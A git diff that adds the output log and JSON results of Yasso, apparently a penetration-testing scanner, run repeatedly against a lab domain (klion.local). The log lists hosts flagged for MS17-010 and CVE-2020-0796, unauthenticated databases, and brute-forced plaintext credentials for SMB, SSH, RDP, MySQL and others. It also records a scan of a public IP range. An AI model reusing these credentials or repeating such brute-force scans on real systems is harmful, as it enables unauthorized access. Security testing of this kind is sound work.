diff --git a/Yasso.json b/Yasso.json
index 425cee6..890cc07 100644
--- a/Yasso.json
+++ b/Yasso.json
@@ -1 +1,51 @@
-[{"HostName":"192.168.248.1","Ports":[8089,135,80,5985,139,445,3306],"WeakPass":[{"smb":{"administrator":"930517"}},{"mysql":{"root":"root"}}],"Web":["200 http://192.168.248.1 [Nginx]  Index of /","200 http://192.168.248.1:8089  None"]},{"HostName":"192.168.248.212","Ports":[445,80,135,139,3389,5985],"WeakPass":[{"smb":{"administrator":"P@ssw0rd"}}],"Web":["200 http://192.168.248.212 [IIS]  IIS Windows Server"]},{"HostName":"192.168.248.219","Ports":[22,27017,21,5432,6379,11211],"WeakPass":[{"ssh":{"root":"kali"}},{"mongodb":{"null":"null"}},{"mongodb":{"admin":"123456"}},{"ftp":{"kali":"kali"}},{"postgres":{"admin":"admin@123"}},{"redis":{"null":"null"}},{"Memcached":{"null":"null"}}],"Web":null}]
\ No newline at end of file
+[
+  {
+    "HostName": "192.168.248.219",
+    "Ports": [
+      21,
+      27017,
+      6379,
+      22,
+      11211,
+      5432
+    ],
+    "WeakPass": [
+      {
+        "ftp": {
+          "kali": "kali"
+        }
+      },
+      {
+        "mongodb": {
+          "null": "null"
+        }
+      },
+      {
+        "mongodb": {
+          "admin": "123456"
+        }
+      },
+      {
+        "redis": {
+          "null": "null"
+        }
+      },
+      {
+        "ssh": {
+          "root": "kali"
+        }
+      },
+      {
+        "Memcached": {
+          "null": "null"
+        }
+      },
+      {
+        "postgres": {
+          "admin": "admin@123"
+        }
+      }
+    ],
+    "Web": null
+  }
+]
\ No newline at end of file
diff --git a/Yasso.log b/Yasso.log
new file mode 100644
index 0000000..0eb1152
--- /dev/null
+++ b/Yasso.log
@@ -0,0 +1,1185 @@
+
+[+] Find 192.168.248.1 (ping)
+[+] Find 192.168.248.219 (ping)
+[+] Find 192.168.248.212 (ping)
+[+] 192.168.248.1 Find CVE-2020-0796
+[+] 192.168.248.212 Find MS17010 (Windows Server 2012 R2 Standard 9600)
+[+] 192.168.248.1 8089 open
+[+] 192.168.248.1 5985 open
+[+] 192.168.248.212 139 open
+[+] 192.168.248.1 3306 open
+[+] 192.168.248.212 80 open
+[+] 192.168.248.219 21 open
+[+] 192.168.248.219 27017 open
+[+] 192.168.248.212 445 open
+[+] 192.168.248.219 11211 open
+[+] 192.168.248.212 135 open
+[+] 192.168.248.1 80 open
+[+] 192.168.248.1 445 open
+[+] 192.168.248.1 135 open
+[+] 192.168.248.212 5985 open
+[+] 192.168.248.219 6379 open
+[+] 192.168.248.1 139 open
+[+] 192.168.248.219 22 open
+[+] 192.168.248.212 3389 open
+[+] 192.168.248.219 5432 open
+
+[+] 192.168.248.219 brute ftp success [kali:kali]
+
+[+] Mongodb 192.168.248.219 unauthorized
+
+[+] 192.168.248.219 brute mongodb success [admin:123456]
+
+[+] 192.168.248.212 brute smb success [administrator:P@ssw0rd]
+
+[+] Redis 192.168.248.219:6379 unauthorized
+[+] os:[Linux 5.10.0-kali7-amd64 x86_64] path:[] dbfilename:[dump.rdb] pid:[12186]
+
+[+] 192.168.248.219 brute ssh success [root:kali]
+[+] Memcached 192.168.248.219:11211 unauthorized
+
+[+] 192.168.248.1 brute smb success [administrator:930517]
+
+[+] 192.168.248.1 brute mysql success [root:root]
+
+[+] 192.168.248.219 brute postgres success [admin:admin@123]
+[NBTBIOS] 192.168.248.212
+	DC02            U Workstation Service
+	KLION           G Domain Name
+	KLION           G Domain Controllers
+	DC02            U Server Service
+	KLION           U Domain Master Browser
+	-------------------------------------------
+	Windows Server 2012 R2 Standard 9600|Windows Server 2012 R2 Standard 6.3
+	NetBIOS domain name   : KLION
+	NetBIOS computer name : DC02
+	DNS domain name       : klion.local
+	DNS computer name     : Dc02.klion.local
+	DNS tree name         : klion.local
+[SMB] IP 192.168.248.212 [domain: KLION hostname: DC02]
+[OXID] Hostname Dc02 Network [192.168.248.212]
+[OXID] Hostname LAPTOP-ESQC1EPT Network [192.168.0.3 192.168.23.1 192.168.248.1]
+[+] 200 http://192.168.248.1 [Nginx]  Index of /
+[+] 200 http://192.168.248.1:8089  None
+[+] 200 http://192.168.248.212 [IIS]  IIS Windows Server
+[+] Find 192.168.248.1 (ping)
+[+] Find 192.168.248.219 (ping)
+[+] Find 192.168.248.212 (ping)
+[+] 192.168.248.1 Find CVE-2020-0796
+[+] 192.168.248.212 Find MS17010 (Windows Server 2012 R2 Standard 9600)
+[+] 192.168.248.1 8089 open
+[+] 192.168.248.1 135 open
+[+] 192.168.248.1 5985 open
+[+] 192.168.248.212 445 open
+[+] 192.168.248.219 5432 open
+[+] 192.168.248.1 80 open
+[+] 192.168.248.219 27017 open
+[+] 192.168.248.219 21 open
+[+] 192.168.248.212 80 open
+[+] 192.168.248.219 22 open
+[+] 192.168.248.219 6379 open
+[+] 192.168.248.1 139 open
+[+] 192.168.248.212 135 open
+[+] 192.168.248.212 139 open
+[+] 192.168.248.219 11211 open
+[+] 192.168.248.212 3389 open
+[+] 192.168.248.1 445 open
+[+] 192.168.248.212 5985 open
+[+] 192.168.248.1 3306 open
+
+[+] 192.168.248.1 brute smb success [administrator:930517]
+
+[+] 192.168.248.212 brute smb success [administrator:P@ssw0rd]
+
+[+] 192.168.248.219 brute ssh success [root:kali]
+
+[+] 192.168.248.1 brute mysql success [root:root]
+
+[+] Mongodb 192.168.248.219 unauthorized
+
+[+] 192.168.248.219 brute mongodb success [admin:123456]
+
+[+] 192.168.248.219 brute ftp success [kali:kali]
+
+[+] 192.168.248.219 brute postgres success [admin:admin@123]
+
+[+] Redis 192.168.248.219:6379 unauthorized
+[+] os:[Linux 5.10.0-kali7-amd64 x86_64] path:[] dbfilename:[dump.rdb] pid:[12186]
+[+] Memcached 192.168.248.219:11211 unauthorized
+[NBTBIOS] 192.168.248.212
+	DC02            U Workstation Service
+	KLION           G Domain Name
+	KLION           G Domain Controllers
+	DC02            U Server Service
+	KLION           U Domain Master Browser
+	-------------------------------------------
+	Windows Server 2012 R2 Standard 9600|Windows Server 2012 R2 Standard 6.3
+	NetBIOS domain name   : KLION
+	NetBIOS computer name : DC02
+	DNS domain name       : klion.local
+	DNS computer name     : Dc02.klion.local
+	DNS tree name         : klion.local
+[SMB] IP 192.168.248.212 [domain: KLION hostname: DC02]
+[OXID] Hostname Dc02 Network [192.168.248.212]
+[OXID] Hostname LAPTOP-ESQC1EPT Network [192.168.0.3 192.168.23.1 192.168.248.1]
+[+] 200 http://192.168.248.1 [Nginx]  Index of /
+[+] 200 http://192.168.248.1:8089  None
+[+] 200 http://192.168.248.212 [IIS]  IIS Windows Server
+[+] Find 192.168.248.1 (ping)
+[+] Find 192.168.248.212 (ping)
+[+] Find 192.168.248.219 (ping)
+[+] 192.168.248.212 Find MS17010 (Windows Server 2012 R2 Standard 9600)
+[+] 192.168.248.1 Find CVE-2020-0796
+[+] 192.168.248.1 3306 open
+[+] 192.168.248.1 5985 open
+[+] 192.168.248.219 5432 open
+[+] 192.168.248.219 21 open
+[+] 192.168.248.219 27017 open
+[+] 192.168.248.1 445 open
+[+] 192.168.248.1 139 open
+[+] 192.168.248.219 6379 open
+[+] 192.168.248.219 11211 open
+[+] 192.168.248.212 80 open
+[+] 192.168.248.212 5985 open
+[+] 192.168.248.212 445 open
+[+] 192.168.248.1 8089 open
+[+] 192.168.248.1 135 open
+[+] 192.168.248.1 80 open
+[+] 192.168.248.219 22 open
+[+] 192.168.248.212 139 open
+[+] 192.168.248.212 3389 open
+[+] 192.168.248.212 135 open
+
+[+] 192.168.248.212 brute smb success [administrator:P@ssw0rd]
+
+[+] Redis 192.168.248.219:6379 unauthorized
+[+] os:[Linux 5.10.0-kali7-amd64 x86_64] path:[] dbfilename:[dump.rdb] pid:[12186]
+
+[+] 192.168.248.1 brute mysql success [root:root]
+
+[+] 192.168.248.219 brute ftp success [kali:kali]
+
+[+] Mongodb 192.168.248.219 unauthorized
+
+[+] 192.168.248.219 brute mongodb success [admin:123456]
+
+[+] 192.168.248.219 brute postgres success [admin:admin@123]
+[+] Memcached 192.168.248.219:11211 unauthorized
+
+[+] 192.168.248.1 brute smb success [administrator:930517]
+
+[+] 192.168.248.219 brute ssh success [root:kali]
+
+[+] 192.168.248.219 brute ssh success [kali:kali]
+[NBTBIOS] 192.168.248.212
+	DC02            U Workstation Service
+	KLION           G Domain Name
+	KLION           G Domain Controllers
+	DC02            U Server Service
+	KLION           U Domain Master Browser
+	-------------------------------------------
+	Windows Server 2012 R2 Standard 9600|Windows Server 2012 R2 Standard 6.3
+	NetBIOS domain name   : KLION
+	NetBIOS computer name : DC02
+	DNS domain name       : klion.local
+	DNS computer name     : Dc02.klion.local
+	DNS tree name         : klion.local
+[SMB] IP 192.168.248.212 [domain: KLION hostname: DC02]
+[OXID] Hostname Dc02 Network [192.168.248.212]
+[OXID] Hostname LAPTOP-ESQC1EPT Network [192.168.0.3 192.168.23.1 192.168.248.1]
+[+] 200 http://192.168.248.212 [IIS]  IIS Windows Server
+[+] 200 http://192.168.248.1 [Nginx]  Index of /
+[+] 200 http://192.168.248.1:8089  None
+[+] Find 192.168.248.219 (ping)
+[+] Find 192.168.248.1 (ping)
+[+] Find 192.168.248.212 (ping)
+[+] 192.168.248.212 Find MS17010 (Windows Server 2012 R2 Standard 9600)
+[+] 192.168.248.212 135 open
+[+] 192.168.248.212 139 open
+[+] 192.168.248.212 3389 open
+[+] 192.168.248.212 80 open
+[+] 192.168.248.219 27017 open
+[+] 192.168.248.212 5985 open
+[+] 192.168.248.212 445 open
+[+] 192.168.248.219 21 open
+[+] 192.168.248.219 6379 open
+[+] 192.168.248.219 5432 open
+[+] 192.168.248.219 22 open
+[+] 192.168.248.219 11211 open
+
+[+] Mongodb 192.168.248.219 unauthorized
+
+[+] 192.168.248.219 brute mongodb success [admin:123456]
+
+[+] 192.168.248.219 brute ftp success [kali:kali]
+
+[+] 192.168.248.212 brute smb success [administrator:P@ssw0rd]
+
+[+] Redis 192.168.248.219:6379 unauthorized
+[+] os:[Linux 5.10.0-kali7-amd64 x86_64] path:[] dbfilename:[dump.rdb] pid:[12186]
+
+[+] 192.168.248.219 brute postgres success [admin:admin@123]
+
+[+] 192.168.248.219 brute ssh success [root:kali]
+
+[+] 192.168.248.219 brute ssh success [kali:kali]
+[+] Memcached 192.168.248.219:11211 unauthorized
+[NBTBIOS] 192.168.248.212
+	DC02            U Workstation Service
+	KLION           G Domain Name
+	KLION           G Domain Controllers
+	DC02            U Server Service
+	KLION           U Domain Master Browser
+	-------------------------------------------
+	Windows Server 2012 R2 Standard 9600|Windows Server 2012 R2 Standard 6.3
+	NetBIOS domain name   : KLION
+	NetBIOS computer name : DC02
+	DNS domain name       : klion.local
+	DNS computer name     : Dc02.klion.local
+	DNS tree name         : klion.local
+[SMB] IP 192.168.248.212 [domain: KLION hostname: DC02]
+[OXID] Hostname Dc02 Network [192.168.248.212]
+[+] 200 http://192.168.248.212 [IIS]  IIS Windows Server
+[+] Find 59.69.128.56 (ping)
+[+] Find 59.69.128.97 (ping)
+[+] Find 59.69.128.100 (ping)
+[+] Find 59.69.128.98 (ping)
+[+] Find 59.69.128.92 (ping)
+[+] Find 59.69.128.26 (ping)
+[+] Find 59.69.128.8 (ping)
+[+] Find 59.69.128.11 (ping)
+[+] Find 59.69.128.9 (ping)
+[+] Find 59.69.128.113 (ping)
+[+] Find 59.69.128.84 (ping)
+[+] Find 59.69.128.119 (ping)
+[+] Find 59.69.128.117 (ping)
+[+] Find 59.69.128.96 (ping)
+[+] Find 59.69.128.120 (ping)
+[+] Find 59.69.128.1 (ping)
+[+] Find 59.69.128.10 (ping)
+[+] Find 59.69.128.129 (ping)
+[+] Find 59.69.128.67 (ping)
+[+] Find 59.69.128.17 (ping)
+[+] 59.69.128.1 80 open
+[+] 59.69.128.10 22 open
+[+] 59.69.128.67 80 open
+[+] 59.69.128.17 443 open
+[+] 59.69.128.1 443 open
+[+] 59.69.128.120 80 open
+[+] 59.69.128.120 22 open
+[+] 59.69.128.113 443 open
+[+] 59.69.128.56 80 open
+[+] 59.69.128.113 9000 open
+[+] 59.69.128.11 22 open
+[+] 403 http://59.69.128.113  403 Forbidden
+[+] 403 https://59.69.128.113  403 Forbidden
+[+] 302 http://59.69.128.113:9000/account/login/?next=/  302 Found
+[+] 301 https://59.69.128.1/simple/view/login.html  
+[+] Find 192.168.248.1 (ping)
+[+] Find 192.168.248.212 (ping)
+[+] Find 192.168.248.219 (ping)
+[+] 192.168.248.1 Find CVE-2020-0796
+[+] 192.168.248.212 Find MS17010 (Windows Server 2012 R2 Standard 9600)
+[+] 192.168.248.1 80 open
+[+] 192.168.248.212 445 open
+[+] 192.168.248.212 3389 open
+[+] 192.168.248.212 80 open
+[+] 192.168.248.1 3306 open
+[+] 192.168.248.1 445 open
+[+] 192.168.248.212 135 open
+[+] 192.168.248.219 27017 open
+[+] 192.168.248.212 139 open
+[+] 192.168.248.1 139 open
+[+] 192.168.248.219 11211 open
+[+] 192.168.248.219 22 open
+[+] 192.168.248.212 5985 open
+[+] 192.168.248.1 135 open
+[+] 192.168.248.1 5985 open
+[+] 192.168.248.219 21 open
+[+] 192.168.248.219 6379 open
+[+] 192.168.248.219 5432 open
+
+[+] 192.168.248.212 brute smb success [administrator:P@ssw0rd]
+
+[+] Mongodb 192.168.248.219 unauthorized
+
+[+] 192.168.248.219 brute mongodb success [admin:123456]
+
+[+] 192.168.248.1 brute mysql success [root:root]
+
+[+] 192.168.248.1 brute smb success [administrator:930517]
+[+] Memcached 192.168.248.219:11211 unauthorized
+
+[+] 192.168.248.219 brute ssh success [kali:kali]
+
+[+] 192.168.248.219 brute ftp success [kali:kali]
+
+[+] Redis 192.168.248.219:6379 unauthorized
+[+] os:[Linux 5.10.0-kali7-amd64 x86_64] path:[] dbfilename:[dump.rdb] pid:[12186]
+
+[+] 192.168.248.219 brute postgres success [admin:admin@123]
+[NBTBIOS] 192.168.248.212
+	DC02            U Workstation Service
+	KLION           G Domain Name
+	KLION           G Domain Controllers
+	DC02            U Server Service
+	KLION           U Domain Master Browser
+	-------------------------------------------
+	Windows Server 2012 R2 Standard 9600|Windows Server 2012 R2 Standard 6.3
+	NetBIOS domain name   : KLION
+	NetBIOS computer name : DC02
+	DNS domain name       : klion.local
+	DNS computer name     : Dc02.klion.local
+	DNS tree name         : klion.local
+[SMB] IP 192.168.248.212 [domain: KLION hostname: DC02]
+[OXID] Hostname Dc02 Network [192.168.248.212]
+[OXID] Hostname LAPTOP-ESQC1EPT Network [192.168.0.3 192.168.23.1 192.168.248.1]
+[+] 200 http://192.168.248.212 [IIS]  IIS Windows Server
+[+] 200 http://192.168.248.1 [Nginx]  Index of /
+[+] Find 192.168.248.1 (ping)
+[+] Find 192.168.248.212 (ping)
+[+] Find 192.168.248.219 (ping)
+[+] 192.168.248.212 Find MS17010 (Windows Server 2012 R2 Standard 9600)
+[+] 192.168.248.1 Find CVE-2020-0796
+[+] 192.168.248.1 80 open
+[+] 192.168.248.212 5985 open
+[+] 192.168.248.219 22 open
+[+] 192.168.248.212 135 open
+[+] 192.168.248.1 445 open
+[+] 192.168.248.212 445 open
+[+] 192.168.248.1 3306 open
+[+] 192.168.248.1 5985 open
+[+] 192.168.248.1 135 open
+[+] 192.168.248.1 139 open
+[+] 192.168.248.219 21 open
+[+] 192.168.248.212 80 open
+[+] 192.168.248.219 5432 open
+[+] 192.168.248.212 3389 open
+[+] 192.168.248.212 139 open
+[+] 192.168.248.219 11211 open
+[+] 192.168.248.219 27017 open
+[+] 192.168.248.219 6379 open
+
+[+] 192.168.248.212 brute smb success [administrator:P@ssw0rd]
+
+[+] 192.168.248.219 brute ssh success [root:kali]
+
+[+] 192.168.248.219 brute ssh success [kali:kali]
+
+[+] 192.168.248.219 brute ftp success [kali:kali]
+
+[+] Mongodb 192.168.248.219 unauthorized
+
+[+] 192.168.248.219 brute mongodb success [admin:123456]
+
+[+] 192.168.248.1 brute smb success [administrator:930517]
+
+[+] 192.168.248.1 brute mysql success [root:root]
+[+] Memcached 192.168.248.219:11211 unauthorized
+
+[+] 192.168.248.219 brute postgres success [admin:admin@123]
+
+[+] Redis 192.168.248.219:6379 unauthorized
+[+] os:[Linux 5.10.0-kali7-amd64 x86_64] path:[] dbfilename:[dump.rdb] pid:[12186]
+[NBTBIOS] 192.168.248.212
+	DC02            U Workstation Service
+	KLION           G Domain Name
+	KLION           G Domain Controllers
+	DC02            U Server Service
+	KLION           U Domain Master Browser
+	-------------------------------------------
+	Windows Server 2012 R2 Standard 9600|Windows Server 2012 R2 Standard 6.3
+	NetBIOS domain name   : KLION
+	NetBIOS computer name : DC02
+	DNS domain name       : klion.local
+	DNS computer name     : Dc02.klion.local
+	DNS tree name         : klion.local
+[SMB] IP 192.168.248.212 [domain: KLION hostname: DC02]
+[OXID] Hostname Dc02 Network [192.168.248.212]
+[OXID] Hostname LAPTOP-ESQC1EPT Network [192.168.0.3 192.168.23.1 192.168.248.1]
+[+] 200 http://192.168.248.212 [IIS]  IIS Windows Server
+[+] 200 http://192.168.248.1 [Nginx]  Index of /
+unknown command "go" for "Yasso"
+
+Did you mean this?
+	ps
+
+[+] Find 192.168.248.212 (ping)
+[+] Find 192.168.248.1 (ping)
+[+] Find 192.168.248.219 (ping)
+[+] 192.168.248.212 Find MS17010 (Windows Server 2012 R2 Standard 9600)
+[+] 192.168.248.1 Find CVE-2020-0796
+[+] 192.168.248.1 139 open
+[+] 192.168.248.1 445 open
+[+] 192.168.248.212 5985 open
+[+] 192.168.248.219 21 open
+[+] 192.168.248.1 80 open
+[+] 192.168.248.219 6379 open
+[+] 192.168.248.219 27017 open
+[+] 192.168.248.1 135 open
+[+] 192.168.248.1 3306 open
+[+] 192.168.248.1 5985 open
+[+] 192.168.248.212 445 open
+[+] 192.168.248.212 80 open
+[+] 192.168.248.212 135 open
+[+] 192.168.248.219 5432 open
+[+] 192.168.248.219 11211 open
+[+] 192.168.248.212 139 open
+[+] 192.168.248.219 22 open
+[+] 192.168.248.212 3389 open
+
+[+] 192.168.248.219 brute ftp success [kali:kali]
+
+[+] Redis 192.168.248.219:6379 unauthorized
+[+] os:[Linux 5.10.0-kali7-amd64 x86_64] path:[] dbfilename:[dump.rdb] pid:[12186]
+
+[+] 192.168.248.212 brute smb success [administrator:P@ssw0rd]
+
+[+] Mongodb 192.168.248.219 unauthorized
+
+[+] 192.168.248.219 brute mongodb success [admin:123456]
+
+[+] 192.168.248.1 brute smb success [administrator:930517]
+[+] Memcached 192.168.248.219:11211 unauthorized
+
+[+] 192.168.248.219 brute postgres success [admin:admin@123]
+
+[+] 192.168.248.1 brute mysql success [root:root]
+[NBTBIOS] 192.168.248.212
+	DC02            U Workstation Service
+	KLION           G Domain Name
+	KLION           G Domain Controllers
+	DC02            U Server Service
+	KLION           U Domain Master Browser
+	-------------------------------------------
+	Windows Server 2012 R2 Standard 9600|Windows Server 2012 R2 Standard 6.3
+	NetBIOS domain name   : KLION
+	NetBIOS computer name : DC02
+	DNS domain name       : klion.local
+	DNS computer name     : Dc02.klion.local
+	DNS tree name         : klion.local
+[SMB] IP 192.168.248.212 [domain: KLION hostname: DC02]
+[OXID] Hostname Dc02 Network [192.168.248.212]
+[OXID] Hostname LAPTOP-ESQC1EPT Network [192.168.0.3 192.168.23.1 192.168.248.1]
+[+] 200 http://192.168.248.212 [IIS]  IIS Windows Server
+[+] 200 http://192.168.248.1 [Nginx]  Index of /
+[+] Find 192.168.248.1 (ping)
+[+] Find 192.168.248.219 (ping)
+[+] 192.168.248.1 Find CVE-2020-0796
+[+] 192.168.248.219 27017 open
+[+] 192.168.248.1 5985 open
+[+] 192.168.248.219 22 open
+[+] 192.168.248.1 445 open
+[+] 192.168.248.1 135 open
+[+] 192.168.248.219 5432 open
+[+] 192.168.248.1 139 open
+[+] 192.168.248.1 8080 open
+[+] 192.168.248.219 6379 open
+[+] 192.168.248.219 21 open
+[+] 192.168.248.219 11211 open
+
+[+] Mongodb 192.168.248.219 unauthorized
+
+[+] 192.168.248.219 brute mongodb success [admin:123456]
+
+[+] Redis 192.168.248.219:6379 unauthorized
+[+] os:[Linux 5.10.0-kali7-amd64 x86_64] path:[] dbfilename:[dump.rdb] pid:[12186]
+
+[+] 192.168.248.1 brute smb success [administrator:930517]
+
+[+] 192.168.248.219 brute postgres success [admin:admin@123]
+
+[+] 192.168.248.219 brute ssh success [root:kali]
+
+[+] 192.168.248.219 brute ftp success [kali:kali]
+[+] Memcached 192.168.248.219:11211 unauthorized
+[OXID] Hostname LAPTOP-ESQC1EPT Network [192.168.23.1 192.168.248.1 192.168.0.3]
+[+] 404 http://192.168.248.1:8080  None
+
+[*] Brute Module [ssh]
+
+[*] Have [user:2] [pass:3] [request:6]
+
+[*] brute ssh done
+
+[*] Brute Module [ssh]
+
+[*] Have [user:2] [pass:3] [request:6]
+
+[*] brute ssh done
+
+[*] Brute Module [ssh]
+
+[*] Have [user:5] [pass:4] [request:20]
+
+[*] Brute Module [ssh]
+
+[*] Have [user:5] [pass:4] [request:20]
+
+[*] Brute Module [ssh]
+
+[*] Have [user:5] [pass:4] [request:5120]
+
+[*] Brute Module [ssh]
+
+[*] Have [user:5] [pass:3] [request:3840]
+
+[*] Brute Module [ssh]
+
+[*] Have [user:5] [pass:3] [request:15]
+
+[*] Brute Module [ssh]
+
+[*] Have [user:5] [pass:3] [request:15]
+
+[*] Brute Module [ssh]
+
+[*] Have [user:5] [pass:3] [request:15]
+
+[*] Brute Module [ssh]
+
+[*] Have [user:5] [pass:3] [request:15]
+
+[*] Brute Module [ssh]
+
+[*] Have [user:5] [pass:3] [request:15]
+
+[*] Brute Module [ssh]
+
+[*] Have [user:4] [pass:3] [request:12]
+
+[*] brute ssh done
+
+[*] Brute Module [ssh]
+
+[*] Have [user:4] [pass:3] [request:12]
+
+[*] brute ssh done
+
+[*] Brute Module [ssh]
+
+[*] Have [user:4] [pass:3] [request:12]
+
+[*] brute ssh done
+
+[*] Brute Module [ssh]
+
+[*] Have [user:4] [pass:4] [request:16]
+
+[+] 192.168.248.219 brute ssh success [kali:kali]
+
+[+] 192.168.248.219 brute ssh success [root:kali]
+
+[*] brute ssh done
+
+[*] Brute Module [ssh]
+
+[*] Have [user:4] [pass:4] [request:16]
+
+[+] 192.168.248.219 brute ssh success [kali:kali]
+
+[+] 192.168.248.219 brute ssh success [root:kali]
+
+[*] brute ssh done
+
+[*] Brute Module [rdp]
+
+[*] Have [user:1] [pass:4] [request:4]
+
+[*] brute rdp done
+
+[*] Brute Module [rdp]
+
+[*] Have [user:1] [pass:3] [request:3]
+
+[*] brute rdp done
+
+[*] Brute Module [ssh]
+
+[*] Have [user:1] [pass:3] [request:3]
+
+[+] 192.168.248.219 brute ssh success [root:kali]
+
+[*] brute ssh done
+
+[*] Brute Module [ssh]
+
+[*] Have [user:2] [pass:3] [request:6]
+
+[+] 192.168.248.219 brute ssh success [root:kali]
+
+[+] 192.168.248.219 brute ssh success [kali:kali]
+
+[*] brute ssh done
+
+[*] Brute Module [ssh]
+
+[*] Have [user:2] [pass:4] [request:8]
+
+[+] 192.168.248.219 brute ssh success [root:kali]
+
+[+] 192.168.248.219 brute ssh success [kali:kali]
+
+[*] brute ssh done
+
+[*] Brute Module [rdp]
+
+[*] Have [user:2] [pass:2] [request:4]
+
+[+] 192.168.248.215 brute rdp success [administrator:930517]
+
+[*] brute rdp done
+
+[*] Brute Module [rdp]
+
+[*] Have [user:2] [pass:3] [request:6]
+
+[+] 192.168.248.215 brute rdp success [administrator:930517]
+
+[*] brute rdp done
+
+[*] May be you want to brute? try to add --crack
+
+[*] Brute Module [rdp]
+
+[*] Have [user:2] [pass:3] [request:6]
+
+[+] 192.168.248.215 brute rdp success [klion.local\administrator:930517]
+
+[*] brute rdp done
+
+[*] Brute Module [rdp]
+
+[*] Have [user:2] [pass:1] [request:2]
+
+[+] 192.168.248.215 brute rdp success [klion.local\administrator:930517]
+
+[*] brute rdp done
+
+[*] Brute Module [rdp]
+
+[*] Have [user:2] [pass:3] [request:6]
+
+[+] 192.168.248.215 brute rdp success [klion.local\administrator:930517]
+
+[*] brute rdp done
+
+[*] Brute Module [rdp]
+
+[*] Have [user:2] [pass:3] [request:6]
+
+[+] 192.168.248.215 brute rdp success [klion.local\administrator:930517]
+
+[*] brute rdp done
+
+[ERROR] Open administrator,Oadmin is failed,please check your user dic path
+
+[*] Brute Module [ssh]
+
+[*] Have [user:0] [pass:0] [request:0]
+
+[*] brute ssh done
+
+[ERROR] Open administrator,Oadmin is failed,please check your user dic path
+
+[*] Brute Module [rdp]
+
+[*] Have [user:0] [pass:0] [request:0]
+
+[*] brute rdp done
+
+[*] Brute Module [rdp]
+
+[*] Have [user:2] [pass:2] [request:4]
+
+[+] 192.168.248.215 brute rdp success [administrator:930517]
+
+[*] brute rdp done
+
+[*] Brute Module [rdp]
+
+[*] Have [user:3] [pass:1] [request:768]
+
+[*] brute rdp done
+[+] Find 192.168.248.1 (ping)
+[+] 192.168.248.1 Find CVE-2020-0796
+[+] 192.168.248.1 139 open
+[+] 192.168.248.1 135 open
+[+] 192.168.248.1 445 open
+[+] 192.168.248.1 5985 open
+[+] Find 192.168.248.1 (ping)
+[+] 192.168.248.1 Find CVE-2020-0796
+[+] 192.168.248.1 139 open
+[+] 192.168.248.1 445 open
+[+] 192.168.248.1 5985 open
+[+] 192.168.248.1 135 open
+[+] Find 192.168.248.1 (ping)
+[+] 192.168.248.1 Find CVE-2020-0796
+[+] 192.168.248.1 135 open
+[+] 192.168.248.1 139 open
+[+] 192.168.248.1 445 open
+[+] 192.168.248.1 5985 open
+[+] Find 192.168.248.1 (ping)
+[+] 192.168.248.1 Find CVE-2020-0796
+[+] 192.168.248.1 445 open
+[+] 192.168.248.1 139 open
+[+] 192.168.248.1 135 open
+[+] 192.168.248.1 5985 open
+[+] Find 192.168.248.1 (ping)
+[+] 192.168.248.1 Find CVE-2020-0796
+[+] 192.168.248.1 139 open
+[+] 192.168.248.1 445 open
+[+] 192.168.248.1 135 open
+[+] 192.168.248.1 5985 open
+[+] Find 192.168.248.1 (ping)
+[+] 192.168.248.1 Find CVE-2020-0796
+[+] 192.168.248.1 135 open
+[+] 192.168.248.1 5985 open
+[+] 192.168.248.1 139 open
+[+] 192.168.248.1 445 open
+[+] Find 192.168.248.1 (ping)
+[+] Find 192.168.248.219 (ping)
+[+] 192.168.248.1 Find CVE-2020-0796
+[+] 192.168.248.1 139 open
+[+] 192.168.248.1 135 open
+[+] 192.168.248.1 5985 open
+[+] 192.168.248.219 5432 open
+[+] 192.168.248.1 445 open
+[+] 192.168.248.219 27017 open
+[+] 192.168.248.219 21 open
+[+] 192.168.248.219 11211 open
+[+] 192.168.248.219 22 open
+[+] 192.168.248.219 6379 open
+[+] Find 192.168.248.1 (ping)
+[+] Find 192.168.248.219 (ping)
+[+] 192.168.248.1 Find CVE-2020-0796
+[+] 192.168.248.1 5985 open
+[+] 192.168.248.1 135 open
+[+] 192.168.248.219 27017 open
+[+] 192.168.248.219 21 open
+[+] 192.168.248.219 22 open
+[+] 192.168.248.1 445 open
+[+] 192.168.248.1 139 open
+[+] 192.168.248.219 11211 open
+[+] 192.168.248.219 5432 open
+[+] 192.168.248.219 6379 open
+[+] Find 192.168.248.1 (ping)
+[+] Find 192.168.248.219 (ping)
+[+] 192.168.248.1 Find CVE-2020-0796
+[+] 192.168.248.1 139 open
+[+] 192.168.248.1 135 open
+[+] 192.168.248.219 27017 open
+[+] 192.168.248.1 445 open
+[+] 192.168.248.219 21 open
+[+] 192.168.248.1 5985 open
+[+] 192.168.248.219 22 open
+[+] 192.168.248.219 11211 open
+[+] 192.168.248.219 6379 open
+[+] 192.168.248.219 5432 open
+[+] Find 192.168.248.219 (ping)
+[+] Find 192.168.248.1 (ping)
+[+] 192.168.248.1 Find CVE-2020-0796
+[+] 192.168.248.1 135 open
+[+] 192.168.248.1 445 open
+[+] 192.168.248.1 139 open
+[+] 192.168.248.219 27017 open
+[+] 192.168.248.219 5432 open
+[+] 192.168.248.219 21 open
+[+] 192.168.248.1 5985 open
+[+] 192.168.248.219 6379 open
+[+] 192.168.248.219 11211 open
+[+] 192.168.248.219 22 open
+
+[+] Mongodb 192.168.248.219 unauthorized
+
+[+] Redis 192.168.248.219:6379 unauthorized
+[+] os:[Linux 5.10.0-kali7-amd64 x86_64] path:[] dbfilename:[dump.rdb] pid:[12186]
+[+] Memcached 192.168.248.219:11211 unauthorized
+[OXID] Hostname LAPTOP-ESQC1EPT Network [192.168.23.1 192.168.248.1 192.168.0.3]
+[+] 200 http://192.168.248.1:8848 [Node.js]  None
+[+] Find 192.168.248.1 (ping)
+[+] Find 192.168.248.219 (ping)
+[+] 192.168.248.1 Find CVE-2020-0796
+[+] 192.168.248.1 135 open
+[+] 192.168.248.219 11211 open
+[+] 192.168.248.219 21 open
+[+] 192.168.248.1 5985 open
+[+] 192.168.248.1 445 open
+[+] 192.168.248.219 27017 open
+[+] 192.168.248.219 6379 open
+[+] 192.168.248.1 139 open
+[+] 192.168.248.219 5432 open
+[+] 192.168.248.219 22 open
+[+] Memcached 192.168.248.219:11211 unauthorized
+
+[+] Redis 192.168.248.219:6379 unauthorized
+[+] os:[Linux 5.10.0-kali7-amd64 x86_64] path:[] dbfilename:[dump.rdb] pid:[12186]
+
+[+] Mongodb 192.168.248.219 unauthorized
+[OXID] Hostname LAPTOP-ESQC1EPT Network [192.168.23.1 192.168.248.1 192.168.0.3]
+[+] 200 http://192.168.248.1:8848 [Node.js]  None
+[+] Find 192.168.248.1 (ping)
+[+] Find 192.168.248.219 (ping)
+[+] 192.168.248.1 Find CVE-2020-0796
+[+] 192.168.248.1 135 open
